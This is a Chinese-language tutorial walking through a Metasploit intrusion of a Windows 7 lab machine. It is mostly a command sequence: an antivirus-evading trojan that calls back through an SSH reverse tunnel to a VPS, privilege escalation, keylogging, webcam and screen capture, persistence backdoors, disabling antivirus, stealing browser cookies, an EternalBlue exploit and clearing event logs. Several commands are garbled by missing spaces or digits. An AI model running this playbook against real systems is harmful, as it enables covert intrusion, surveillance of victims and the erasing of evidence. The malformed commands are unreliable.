Metasploit 是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用 msf 给大家带来一场盛大的内网渗透体验,别眨眼噢!
环境准备:
靶机 win 7 IP=192.168.43.150 kali linux IP=192.168.43.153 VPS 服务器 IP=xx.xx.xx.xx
实战演示:
1、先用 evil-evasion 生成具有一定免杀功能的 windows 木马,监听地址设成 VPS 的地址(打码防 D),然后将 VPS 上的 2333 端口映射到内网 kali 的 2333 端口,同时还要修改 VPS上 的 ssh 配置,不然别人是连不上 VPS 的(在实战中自己常常在内网,所以这里介绍一下 VPS )
vi /etc/ssh/sshd_config && GatewayPorts:yes
ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402
2、启动 kali 设置 msf 监听,lport=2333
,lhost=192.168.43.153
(注意:这里的监听地址是 kali 的地址,不是 VPS 的),关于 msf 的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章
http://www.freebuf.com/sectool/67674.html
[*]如果想要在 docker 启动持续监听可以用如下命令:
set exitonsession false && run -j
3、在 win 7 中执行木马
4、接收到 meterpreter 之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到 win 7的桌面进程:
migrate 1988 && getpid
5、查看当前权限、系统信息,并尝试提权
getuid && sysinfo && getsystem
6、查看网络、路由信息
ifconfig && route
7、监视靶机的桌面
run vnc
8、启动键盘监听
keyscan_start && keyscan_dump
9、设置后门,维持权限
run persistence -U -i 10 -p 2333192.168.43.153
run persistence -X -i 10 -p 2333192.168.43.153
10、截屏查看靶机当前桌面
screenshot
11、查看当前系统空闲时间
idletime
12、禁用靶机使用键盘鼠标(笔者 win 7 系统是 64 位的,不支持这个操作)
uictl disable keyboard
uictl disable mouse
13、查找靶机中重要的敏感文件
search -d c:\\ -f payload.exe
14、指定下载靶机中的文件到本地
dowmloadc:\\Users\\root\\Desktop\\payload.exe/root/Desktop
15、上传指定本地文件到靶机中
upload/root/Desktop/hack.jpegc:\\Users\\root\\Desktop\\payload.exe
16、打开靶机摄像头,win 7 虚拟机没有摄像头所以没反应
webcam_snap
1、调用 post 模块查看当前系统可用的提权模块
run post/multi/recon/local_exploit_suggester
2、调用 payload 模块对靶机进行远程桌面操作
set payload windows/vncinject/reverse_tcp
set viewonly no
3、关掉靶机中的杀软
killav
4、收集靶机浏览器的敏感信息(访问记录、cookie )
run post/windows/gather/enum_ie
5、设置路由转发,扫描内网机器开放的端口( routeadd 靶机 IP 子网掩码 sessions )
route add 92.168.43.150 255.255.255.0 3
use auxiliary/scanner/portscan/tcp
6、扫描一波内网有没有 ms17_010 漏洞的主机
use auxiliary/scanner/smb/smb_ms17_010
7、笔者扫到 win 7 就有这个漏洞,然后就愉快的调用 exp 搞一波
use exploit/windows/smb/ms17_010_eternalblue
8、功成身退
clearev
msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!